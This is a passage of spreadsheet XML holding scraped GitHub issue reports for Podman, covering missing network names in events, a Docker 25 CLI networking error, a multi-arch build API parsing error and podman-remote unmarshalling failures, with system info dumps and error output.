    <t xml:space="preserve"> Issue Description Podman network events as emitted by `podman events` (connect, disconnect) don't include the network name or ID, making it impossible to use events to watch for changes to a specific network. Looking at the source code, the network name is included in the low level event data, but seems to be lost when converting between libpod Events and Docker compatible events via [ConvertToEntitiesEvent](https://github.com/containers/podman/blob/815ae77ab26cea3a5430116db682d9df46fc8845/pkg/domain/entities/events.go#L62) and [ConvertToLibpodEvent](https://github.com/containers/podman/blob/815ae77ab26cea3a5430116db682d9df46fc8845/pkg/domain/entities/events.go#L21).  Steps to reproduce the issue Steps to reproduce the issue 1. Run `podman events --format json` 2. In another terminal window, connect or disconnect a container to any networks `podman network connect &lt;network&gt; &lt;container&gt;` or `podman network disconenct &lt;network&gt; &lt;container&gt;` 3. Check the contents of the `Connect` and `Disconnect` events emitted  Describe the results you received I see events like this emitted: json {"ID":"3d9d442dab9029e5e1b5d82307972ce3ff9b9f49d0473b4b762f256bdee1f96f","Status":"disconnect","Time":"2024-01-19T13:48:43.873758119-08:00","Type":"network","Attributes":{"podId":""}} {"ID":"3d9d442dab9029e5e1b5d82307972ce3ff9b9f49d0473b4b762f256bdee1f96f","Status":"connect","Time":"2024-01-19T14:10:31.823991946-08:00","Type":"network","Attributes":{"podId":""}}  Each network event includes the ID of the relevant container, but not the ID or name of the network the container was connected to (or disconnected from).  Describe the results you expected I expect to see events like: json {"ID":"3d9d442dab9029e5e1b5d82307972ce3ff9b9f49d0473b4b762f256bdee1f96f","Status":"disconnect","Time":"2024-01-19T13:48:43.873758119-08:00","Type":"network","Network":"test","Attributes":{"podId":""}} {"ID":"3d9d442dab9029e5e1b5d82307972ce3ff9b9f49d0473b4b762f256bdee1f96f","Status":"connect","Time":"2024-01-19T14:10:31.823991946-08:00","Type":"network","Network":"test","Attributes":{"podId":""}}   podman info output yaml host: arch: arm64 buildahVersion: 1.33.2 cgroupControllers: - cpuset - cpu - io - memory - pids - rdma - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.8-2.fc39.aarch64 path: /usr/bin/conmon version: 'conmon version 2.1.8, commit: ' cpuUtilization: idlePercent: 99.54 systemPercent: 0.22 userPercent: 0.24 cpus: 2 databaseBackend: sqlite distribution: distribution: fedora variant: coreos version: "39" eventLogger: journald freeLocks: 2045 hostname: localhost.localdomain idMappings: gidmap: null uidmap: null kernel: 6.6.8-200.fc39.aarch64 linkmode: dynamic logDriver: journald memFree: 616837120 memTotal: 3795222528 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.9.0-1.fc39.aarch64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.9.0 package: netavark-1.9.0-1.fc39.aarch64 path: /usr/libexec/podman/netavark version: netavark 1.9.0 ociRuntime: name: crun package: crun-1.12-1.fc39.aarch64 path: /usr/bin/crun version: |- crun version 1.12 commit: ce429cb2e277d001c2179df1ac66a470f00802ae rundir: /run/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20231204.gb86afe3-1.fc39.aarch64 version: | pasta 0^20231204.gb86afe3-1.fc39.aarch64-pasta Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: true slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.2-1.fc39.aarch64 version: |- slirp4netns version 1.2.2 commit: 0ee2d87523e906518d34a6b423271e4826f71faf libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 0 swapTotal: 0 uptime: 36h 19m 18.00s (Approximately 1.50 days) variant: v8 plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - docker.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 1 paused: 0 running: 1 stopped: 0 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 99252940800 graphRootUsed: 4171116544 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "false" Supports d_type: "true" Supports shifting: "true" Supports volatile: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 6 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.8.2 Built: 1702300963 BuiltTime: Mon Dec 11 05:22:43 2023 GitCommit: "" GoVersion: go1.21.4 Os: linux OsArch: linux/arm64 Version: 4.8.2   Podman in a container No  Privileged Or Rootless Privileged  Upstream Latest Release Yes  Additional environment details Podman Desktop (v1.6.4) on ARM64 MacOS  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/21754</t>
  </si>
  <si>
    <t>docker 25 CLI is unable to run a container in quay.io/podman/upstream: default networking argument issue</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Hi, When using a Docker 25 CLI targetting a podman socket from `quay.io/podman/upstream`, it fails with:  docker: Error response from daemon: container create: invalid config provided: networks and static ip/mac address can only be used with Bridge mode networking.  The docker CLI 24 (and older) does work fine. Investigating a bit with socat the difference between the API calls, I end up with this request from docker 24 CLI (for the `POST /v1.41/containers/create` API call):  {"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":null,"Cmd":null,"Image":"quay.io/fedora/fedora","Volumes":{},"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LogConfig":{"Type":"","Config":{}},"NetworkMode":"default","PortBindings":{},"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"AutoRemove":true,"VolumeDriver":"","VolumesFrom":null,"ConsoleSize":[26,227],"CapAdd":null,"CapDrop":null,"CgroupnsMode":"","Dns":[],"DnsOptions":[],"DnsSearch":[],"ExtraHosts":null,"GroupAdd":null,"IpcMode":"","Cgroup":"","Links":null,"OomScoreAdj":0,"PidMode":"","Privileged":false,"PublishAllPorts":false,"ReadonlyRootfs":false,"SecurityOpt":null,"UTSMode":"","UsernsMode":"","ShmSize":0,"Isolation":"","CpuShares":0,"Memory":0,"NanoCpus":0,"CgroupParent":"","BlkioWeight":0,"BlkioWeightDevice":[],"BlkioDeviceReadBps":[],"BlkioDeviceWriteBps":[],"BlkioDeviceReadIOps":[],"BlkioDeviceWriteIOps":[],"CpuPeriod":0,"CpuQuota":0,"CpuRealtimePeriod":0,"CpuRealtimeRuntime":0,"CpusetCpus":"","CpusetMems":"","Devices":[],"DeviceCgroupRules":null,"DeviceRequests":null,"MemoryReservation":0,"MemorySwap":0,"MemorySwappiness":-1,"OomKillDisable":false,"PidsLimit":0,"Ulimits":null,"CpuCount":0,"CpuPercent":0,"IOMaximumIOps":0,"IOMaximumBandwidth":0,"MaskedPaths":null,"ReadonlyPaths":null},"NetworkingConfig":{"EndpointsConfig":{  and this request from docker 25 CLI:  {"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":null,"Cmd":null,"Image":"quay.io/fedora/fedora","Volumes":{},"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LogConfig":{"Type":"","Config":{}},"NetworkMode":"default","PortBindings":{},"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"AutoRemove":true,"VolumeDriver":"","VolumesFrom":null,"ConsoleSize":[26,227],"CapAdd":null,"CapDrop":null,"CgroupnsMode":"","Dns":[],"DnsOptions":[],"DnsSearch":[],"ExtraHosts":null,"GroupAdd":null,"IpcMode":"","Cgroup":"","Links":null,"OomScoreAdj":0,"PidMode":"","Privileged":false,"PublishAllPorts":false,"ReadonlyRootfs":false,"SecurityOpt":null,"UTSMode":"","UsernsMode":"","ShmSize":0,"Isolation":"","CpuShares":0,"Memory":0,"NanoCpus":0,"CgroupParent":"","BlkioWeight":0,"BlkioWeightDevice":[],"BlkioDeviceReadBps":[],"BlkioDeviceWriteBps":[],"BlkioDeviceReadIOps":[],"BlkioDeviceWriteIOps":[],"CpuPeriod":0,"CpuQuota":0,"CpuRealtimePeriod":0,"CpuRealtimeRuntime":0,"CpusetCpus":"","CpusetMems":"","Devices":[],"DeviceCgroupRules":null,"DeviceRequests":null,"MemoryReservation":0,"MemorySwap":0,"MemorySwappiness":-1,"OomKillDisable":false,"PidsLimit":0,"Ulimits":[],"CpuCount":0,"CpuPercent":0,"IOMaximumIOps":0,"IOMaximumBandwidth":0,"MaskedPaths":null,"ReadonlyPaths":null},"NetworkingConfig":{"EndpointsConfig":{"default":{"IPAMConfig":null,"Links":null,"Aliases":null,"MacAddress":"","NetworkID":"","EndpointID":"","Gateway":"","IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"DriverOpts":null,"DNSNames":null  Using "jq" to pretty print it and show the differences, I ended up with this:  rgeissler@ncerndobedev6097:/tmp&gt; diff -u &lt;(cat docker-24|jq) &lt;(cat docker-25|jq) 7:11PM  /proc/self/fd/12 2024-02-19 19:11:54.051981352 +0000  /proc/self/fd/13 2024-02-19 19:11:54.055981487 +0000 @@ -81,7 +81,7 @@ "MemorySwappiness": -1, "OomKillDisable": false, "PidsLimit": 0, - "Ulimits": null, + "Ulimits": [], "CpuCount": 0, "CpuPercent": 0, "IOMaximumIOps": 0, @@ -90,6 +90,23 @@ "ReadonlyPaths": null }, "NetworkingConfig": { - "EndpointsConfig": {} + "EndpointsConfig": { + "default": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "MacAddress": "", + "NetworkID": "", + "EndpointID": "", + "Gateway": "", + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "DriverOpts": null, + "DNSNames": null + } + } } }  So the "root cause" is this new default "EndpointsConfig" struct, which seems all default initialized and which podman somehow interprets differently from an empty `{}` json config. I didn't check the code yet to see if there is a quick fix for this issue. Cheers, Romain  Steps to reproduce the issue Steps to reproduce the issue 1. Start a `quay.io/podman/upstream` container start a podman server:  &gt; podman run -t -i --rm --privileged --name=podman-server -v /shared-volume --pull=always quay.io/podman/upstream podman system service -t 0 unix:shared-volume/podman.sock Trying to pull quay.io/podman/upstream:latest Getting image source signatures Copying blob sha256:b2013b443c422f98f009bfb9f930cc424428f8ccb694c84a26ebeb98891687f9 Copying blob sha256:cf73a40571609daa501dab6a62c1d08ca1665278b2355f5a36424804281c62fe Copying blob sha256:439ec636831d395b84ce0dfd6390420c60a8aa2a128a88b7dc55236a5e54c7a1 Copying blob sha256:2026b963063adee0348d722192a5761e34b449d666f6f79a687818f40a96a67f Copying blob sha256:718a00fe32127ad01ddab9fc4b7c968ab2679c92c6385ac6865ae6e2523275e4 Copying blob sha256:d2ea58b809bcf20a5fa73f3bce6c4ac3f371fbd010700dc0979f495f53b7fc76 Copying blob sha256:e16106bb651e790ca91447e2fc47c5a2f86e4824cd3bada6d63419f9801e4f93 Copying blob sha256:7323cd5de043ae967491a338060d6d1c51eed17c19bda023d76f72b326d7b5bf Copying blob sha256:39cd8764a88b128c21ab1816efa5c0179a803ed18ada3aa9c5f09d23b231787f Copying config sha256:8739df1320065867713c219a7efdb999e478796c0059e25143f10f54272fe833 Writing manifest to image destination  2. Try to run a container inside the first one, using a docker 25 CLI. I used explicitly `--oom-score-adj=1000` to workaround the issue fixed by #21487:  &gt; podman run -t -i --rm --pull=always --volumes-from=podman-server -e DOCKER_HOST=unix:shared-volume/podman.sock docker:25-cli docker run -t -i --rm --oom-score-adj=1000 quay.io/fedora/fedora Trying to pull docker.io/library/docker:25-cli Getting image source signatures Copying blob sha256:f23a00be1976186eef218bb9b79ab99203e0c5b235c1b49e77f3ac3264793d78 Copying blob sha256:4abcf20661432fb2d719aaf90656f55c287f8ca915dc1c92ec14ff61e67fbaf8 Copying blob sha256:1bd9561ee09aa7423609ac837068a53ad4a8fd35b8b6d51528d78cb126eb3b07 Copying blob sha256:4f4fb700ef54461cfa02571ae0db9a0dc1e0cdb5577484a6d75e68dc38e8acc1 Copying blob sha256:a48a116699ba1fe77921e9ab9fef2dc65016ac2e483b07f03921526b8a0fcf79 Copying blob sha256:41dc1292823582d19d9bc523915a590652c16d3bedc6099b345ec38efd77e6a0 Copying blob sha256:e56d49cdf5732fc93fbea227838e14f9772a369a669592554ca37cf4695be03d Copying blob sha256:b6735844810a03df9d76e5aa58d3df2f1c56f6c208093eba5f88e5806f1cda04 Copying blob sha256:49704df22e8621ca86fd75cb61b8f23ee280754df0048a7bf46cd8b96ec2551f Copying blob sha256:b0f5f50d82ecbeeeea34901bdac4b25948f5f7146f2842d8a7aeb9a730459567 Copying config sha256:e95f54c1fcc216bc7d10270705e5ce8f98504f69d2afba666d6ce12e940da2f6 Writing manifest to image destination Unable to find image 'quay.io/fedora/fedora:latest' locally 718a00fe3212: Download complete 368a084ba17d: Download complete docker: Error response from daemon: container create: invalid config provided: networks and static ip/mac address can only be used with Bridge mode networking. See 'docker run --help'.  3. Doing exactly the same thing, with `docker:24-cli` instead works just fine:  &gt; podman run -t -i --rm --pull=always --volumes-from=podman-server -e DOCKER_HOST=unix:shared-volume/podman.sock docker:24-cli docker run -t -i --rm --oom-score-adj=1000 quay.io/fedora/fedora Trying to pull docker.io/library/docker:24-cli Getting image source signatures Copying blob sha256:4abcf20661432fb2d719aaf90656f55c287f8ca915dc1c92ec14ff61e67fbaf8 Copying blob sha256:4f4fb700ef54461cfa02571ae0db9a0dc1e0cdb5577484a6d75e68dc38e8acc1 Copying blob sha256:1db5a4f146e2df1f17a2c0db7ffd672b18d1750d31c7e58e352a6536d4b7ad52 Copying blob sha256:248ec8ed73b325a9cff9ec3c5bbd2c249065ee96053dfc3beafb911ef652a195 Copying blob sha256:5aed6b72066db35b8929c11c552f9e827431de2b2de62b4384a1eaed88221787 Copying blob sha256:9908927dc97522b6d63aaaf9953c4095be9b24a1d080edb1ada9124d56bf41ad Copying blob sha256:d280e8e81156b63b7306ac0701738e22b333c7a26bdd96ddafb3ec8f607d2a32 Copying blob sha256:97f6ee5ccb7fa02811eb89d903666095e18e38c42a635369912f9ba0fd11e6eb Copying blob sha256:d4462dfff57f9ac45d562ae18d1ca53fef4918ae18e003d21ebf960b3ade6f94 Copying blob sha256:a474f84a4abb535fa3a05ee5a59bff31a53d0857d4d53bab82a9f2f3684c4c7c Copying config sha256:b4e4d47cb84703dc6042823b7e29e3111074beb09b50848a31cdb9cd9565ed9a Writing manifest to image destination [root@56d0c302cd66 /]# ^C [root@56d0c302cd66 /]# exit exit   Describe the results you received Podman cannot be used with docker 25 CLI (in container mode) while it was working with docker 24 CLI.  Describe the results you expected Podman can be used with docker 25 CLI (in container mode).  podman info output yaml Tried on `quay.io/podman/upstream` on an up to date x86_64 RHEL 9.   Podman in a container Yes  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details _No response_  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/22071</t>
  </si>
  <si>
    <t>Unable to build multi-arch via Podman CURL / API.</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description When trying to pass in `--platform` equivalent within the API, I am getting this parsing error:  {"cause":"invalid argument","message":"failed to parse query parameter 'platform': \"linux/arm64,linux/amd64\": invalid platform syntax for --platform=\"linux/arm64,linux/amd64\": \"arm64,linux\" is an invalid component of \"linux/arm64,linux/amd64\": platform specifier component must match \"^[A-Za-z0-9_-]+$\": invalid argument","response":400}   Steps to reproduce the issue Steps to reproduce the issue 1. Package any Containerfile (`tar -czf context.tar.gz -C dir .`) 2. Use the below CURL command: sh curl --unix-socket ~/.local/share/containers/podman/machine/applehv/podman.sock -X POST \ -H "Content-Type: application/tar" \ -H "Content-Encoding: gzip" \ --data-binary "@context.tar.gz" \ "http://d/v4.0.0/libpod/build?platform=linux/arm64,linux/amd64&amp;t=quay.io/mytestcontainer" {"cause":"invalid argument","message":"failed to parse query parameter 'platform': \"linux/arm64,linux/amd64\": invalid platform syntax for --platform=\"linux/arm64,linux/amd64\": \"arm64,linux\" is an invalid component of \"linux/arm64,linux/amd64\": platform specifier component must match \"^[A-Za-z0-9_-]+$\": invalid argument","response":400}   Describe the results you received Getting a platform error (see above).  Describe the results you expected Passing, similar to:  podman build --platform="linux/arm64,linux/amd64" -t mytestcontainer .   podman info output yaml  podman info host: arch: arm64 buildahVersion: 1.34.1-dev cgroupControllers: - cpuset - cpu - io - memory - pids - rdma - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.10-1.fc39.aarch64 path: /usr/bin/conmon version: 'conmon version 2.1.10, commit: ' cpuUtilization: idlePercent: 98.84 systemPercent: 0.65 userPercent: 0.51 cpus: 5 databaseBackend: sqlite distribution: distribution: fedora variant: coreos version: "39" eventLogger: journald freeLocks: 2020 hostname: localhost.localdomain idMappings: gidmap: null uidmap: null kernel: 6.7.5-200.fc39.aarch64 linkmode: dynamic logDriver: journald memFree: 510242816 memTotal: 2047860736 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.10.0-1.20240229100444279141.main.16.g03ce519.fc39.aarch64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.11.0-dev package: netavark-1.10.1-1.20240229113356745230.main.40.g773fd54.fc39.aarch64 path: /usr/libexec/podman/netavark version: netavark 1.11.0-dev ociRuntime: name: crun package: crun-1.14.3-1.20240229113428746398.main.10.g31aab34.fc39.aarch64 path: /usr/bin/crun version: |- crun version UNKNOWN commit: aea8fc0fc7d0aabdbcfd1462d7bf6ea0d1e5215b rundir: /run/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20240220.g1e6f92b-1.fc39.aarch64 version: | pasta 0^20240220.g1e6f92b-1.fc39.aarch64-pasta Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: true slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.2-1.fc39.aarch64 version: |- slirp4netns version 1.2.2 commit: 0ee2d87523e906518d34a6b423271e4826f71faf libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 0 swapTotal: 0 uptime: 0h 32m 30.00s variant: v8 plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - docker.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 2 paused: 0 running: 0 stopped: 2 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 106769133568 graphRootUsed: 21349634048 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "false" Supports d_type: "true" Supports shifting: "true" Supports volatile: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 10 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 5.0.0-dev-96f9d0867 Built: 1709164800 BuiltTime: Wed Feb 28 19:00:00 2024 GitCommit: "" GoVersion: go1.21.7 Os: linux OsArch: linux/arm64 Version: 5.0.0-dev-96f9d0867    Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details Additional environment details  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/22616</t>
  </si>
  <si>
    <t>podman-remote volume rm ambiguous-name: unmarshalling error</t>
  </si>
  <si>
    <t xml:space="preserve">console $ bin/podman-remote volume create myvol1 myvol1 $ bin/podman-remote volume create myvol2 myvol2 $ bin/podman-remote volume rm myv Error: unmarshalling error into &amp;errorhandling.ErrorModel{Because:"", Message:"", ResponseCode:0}, data "{\"cause\":\"volume already exists\",\"message\":\"more than one result for volume name myv: volume already exists\",\"response\":500}\n{\"cause\":\"volume already exists\",\"message\":\"more than one result for volume name myv: volume already exists\",\"response\":404}\n": invalid character '{' after top-level value </t>
  </si>
  <si>
    <t>bg</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/22657</t>
  </si>
  <si>
    <t>when host has podman from podman-next and podman-remote is run inside a toolbox : unmarshalling error</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description I was trying to reproduce the issue https://github.com/containers/podman/issues/21974 which is valid for podman &lt; 5 (did not bisect, take this with a grain of salt). I realized that having podman installed from podman next leads to an error.  Steps to reproduce the issue Steps to reproduce the issue 1. Install podman from the podman-next copr on the host 2. Follow the reproducer of https://github.com/containers/podman/issues/21974 until `podman-remote run` 3. Run the step `podman-remote run --cidfile /var/tmp/cidfile fedora:latest true` in the toolbox  Describe the results you received  Error: unmarshalling into &amp;define.InspectContainerData{ID:"221aadce464435e1eed931dffe7326d8524e40139614e4c1ce0877463f064816", Created:time.Date(2024, time.May, 9, 15, 37, 24, 363282572, time .Local), Path:"true", Args:[]string{"true"}, State:(*define.InspectContainerState)(0x4000532000), Image:"a3b2e2a9704e6b54b78f4924f5b1318dbd7aa2553736944dd966cef32da5e37a", ImageDigest:"sha25 6:a4a66434bd361d9c80cd6fd5b0ee3112a0347aed794141b372ce0c4f09afb791", ImageName:"registry.fedoraproject.org/fedora:latest", Rootfs:"", Pod:"", ResolvConfPath:"", HostnamePath:"", HostsPath:"" , StaticDir:"/home/nsella/.local/share/containers/storage/overlay-containers/221aadce464435e1eed931dffe7326d8524e40139614e4c1ce0877463f064816/userdata", OCIConfigPath:"", OCIRuntime:"crun", ConmonPidFile:"/run/user/1000/containers/overlay-containers/221aadce464435e1eed931dffe7326d8524e40139614e4c1ce0877463f064816/userdata/conmon.pid", PidFile:"/run/user/1000/containers/overlay- containers/221aadce464435e1eed931dffe7326d8524e40139614e4c1ce0877463f064816/userdata/pidfile", Name:"nifty_clarke", RestartCount:0, Driver:"overlay", MountLabel:"system_u:object_r:container_ file_t:s0:c139,c898", ProcessLabel:"system_u:system_r:container_t:s0:c139,c898", AppArmorProfile:"", EffectiveCaps:[]string{"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FOWNER", "CAP_FSETID", "CAP_ KILL", "CAP_NET_BIND_SERVICE", "CAP_SETFCAP", "CAP_SETGID", "CAP_SETPCAP", "CAP_SETUID", "CAP_SYS_CHROOT"}, BoundingCaps:[]string{"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL", "CAP_NET_BIND_SERVICE", "CAP_SETFCAP", "CAP_SETGID", "CAP_SETPCAP", "CAP_SETUID", "CAP_SYS_CHROOT"}, ExecIDs:[]string{}, GraphDriver:(*define.DriverData)(0x40006b8978), SizeRw:( *int64)(nil), SizeRootFs:0, Mounts:[]define.InspectMount{}, Dependencies:[]string{}, NetworkSettings:(*define.InspectNetworkSettings)(0x40002bf680), Namespace:"", IsInfra:false, IsService:fa lse, KubeExitCodePropagation:"invalid", LockNumber:0x1, Config:(*define.InspectContainerConfig)(0x4000636600), HostConfig:(*define.InspectContainerHostConfig)(0x40006c0400)}, data "{\"Id\":\ "221aadce464435e1eed931dffe7326d8524e40139614e4c1ce0877463f064816\",\"Created\":\"2024-05-09T15:37:24.363282572+02:00\",\"Path\":\"true\",\"Args\":[\"true\"],\"State\":{\"OciVersion\":\"1.2. 0\",\"Status\":\"created\",\"Running\":false,\"Paused\":false,\"Restarting\":false,\"OOMKilled\":false,\"Dead\":false,\"Pid\":0,\"ExitCode\":0,\"Error\":\"\",\"StartedAt\":\"0001-01-01T00:00 :00Z\",\"FinishedAt\":\"0001-01-01T00:00:00Z\",\"CheckpointedAt\":\"0001-01-01T00:00:00Z\",\"RestoredAt\":\"0001-01-01T00:00:00Z\"},\"Image\":\"a3b2e2a9704e6b54b78f4924f5b1318dbd7aa255373694 4dd966cef32da5e37a\",\"ImageDigest\":\"sha256:a4a66434bd361d9c80cd6fd5b0ee3112a0347aed794141b372ce0c4f09afb791\",\"ImageName\":\"registry.fedoraproject.org/fedora:latest\",\"Rootfs\":\"\",\" Pod\":\"\",\"ResolvConfPath\":\"\",\"HostnamePath\":\"\",\"HostsPath\":\"\",\"StaticDir\":\"/home/nsella/.local/share/containers/storage/overlay-containers/221aadce464435e1eed931dffe7326d852 4e40139614e4c1ce0877463f064816/userdata\",\"OCIRuntime\":\"crun\",\"ConmonPidFile\":\"/run/user/1000/containers/overlay-containers/221aadce464435e1eed931dffe7326d8524e40139614e4c1ce0877463f0 64816/userdata/conmon.pid\",\"PidFile\":\"/run/user/1000/containers/overlay-containers/221aadce464435e1eed931dffe7326d8524e40139614e4c1ce0877463f064816/userdata/pidfile\",\"Name\":\"nifty_cl arke\",\"RestartCount\":0,\"Driver\":\"overlay\",\"MountLabel\":\"system_u:object_r:container_file_t:s0:c139,c898\",\"ProcessLabel\":\"system_u:system_r:container_t:s0:c139,c898\",\"AppArmor Profile\":\"\",\"EffectiveCaps\":[\"CAP_CHOWN\",\"CAP_DAC_OVERRIDE\",\"CAP_FOWNER\",\"CAP_FSETID\",\"CAP_KILL\",\"CAP_NET_BIND_SERVICE\",\"CAP_SETFCAP\",\"CAP_SETGID\",\"CAP_SETPCAP\",\"CAP_ SETUID\",\"CAP_SYS_CHROOT\"],\"BoundingCaps\":[\"CAP_CHOWN\",\"CAP_DAC_OVERRIDE\",\"CAP_FOWNER\",\"CAP_FSETID\",\"CAP_KILL\",\"CAP_NET_BIND_SERVICE\",\"CAP_SETFCAP\",\"CAP_SETGID\",\"CAP_SET PCAP\",\"CAP_SETUID\",\"CAP_SYS_CHROOT\"],\"ExecIDs\":[],\"GraphDriver\":{\"Name\":\"overlay\",\"Data\":{\"LowerDir\":\"/home/nsella/.local/share/containers/storage/overlay/e46c7a886cbfe1e67 41a81b494cf8f025358b9e74f625b1a930960d1974e7387/diff\",\"UpperDir\":\"/home/nsella/.local/share/containers/storage/overlay/45eb3c184e2e64464f1cdc979ca8c5f4b9beca07d7cad9eb911cd889bfab54c6/di ff\",\"WorkDir\":\"/home/nsella/.local/share/containers/storage/overlay/45eb3c184e2e64464f1cdc979ca8c5f4b9beca07d7cad9eb911cd889bfab54c6/work\"}},\"Mounts\":[],\"Dependencies\":[],\"NetworkS ettings\":{\"EndpointID\":\"\",\"Gateway\":\"\",\"IPAddress\":\"\",\"IPPrefixLen\":0,\"IPv6Gateway\":\"\",\"GlobalIPv6Address\":\"\",\"GlobalIPv6PrefixLen\":0,\"MacAddress\":\"\",\"Bridge\": \"\",\"SandboxID\":\"\",\"HairpinMode\":false,\"LinkLocalIPv6Address\":\"\",\"LinkLocalIPv6PrefixLen\":0,\"Ports\":{},\"SandboxKey\":\"\",\"Networks\":{\"pasta\":{\"EndpointID\":\"\",\"Gatew ay\":\"\",\"IPAddress\":\"\",\"IPPrefixLen\":0,\"IPv6Gateway\":\"\",\"GlobalIPv6Address\":\"\",\"GlobalIPv6PrefixLen\":0,\"MacAddress\":\"\",\"NetworkID\":\"pasta\",\"DriverOpts\":null,\"IPA MConfig\":null,\"Links\":null,\"Namespace\":\"\",\"IsInfra\":false,\"IsService\":false,\"KubeExitCodePropagation\":\"invalid\",\"lockNumber\":1,\"Config\":{\"Hostname\":\"221aadce4644\",\ "Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"FGC=f39\",\"PATH=/usr/lo cal/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"container=oci\",\"DISTTAG=f39container\"],\"Cmd\":[\"true\"],\"Image\":\"registry.fedoraproject.org/fedora:latest\",\"Volumes\":null ,\"WorkingDir\":\"/\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{\"license\":\"MIT\",\"name\":\"fedora\",\"vendor\":\"Fedora Project\",\"version\":\"39\"},\"Annotations\":{\"io.podman. annotations.cid-file\":\"/var/tmp/cidfile\"},\"StopSignal\":\"SIGTERM\",\"HealthcheckOnFailureAction\":\"none\",\"CreateCommand\":[\"podman-remote\",\"run\",\"--cidfile\",\"/var/tmp/cidfile\ 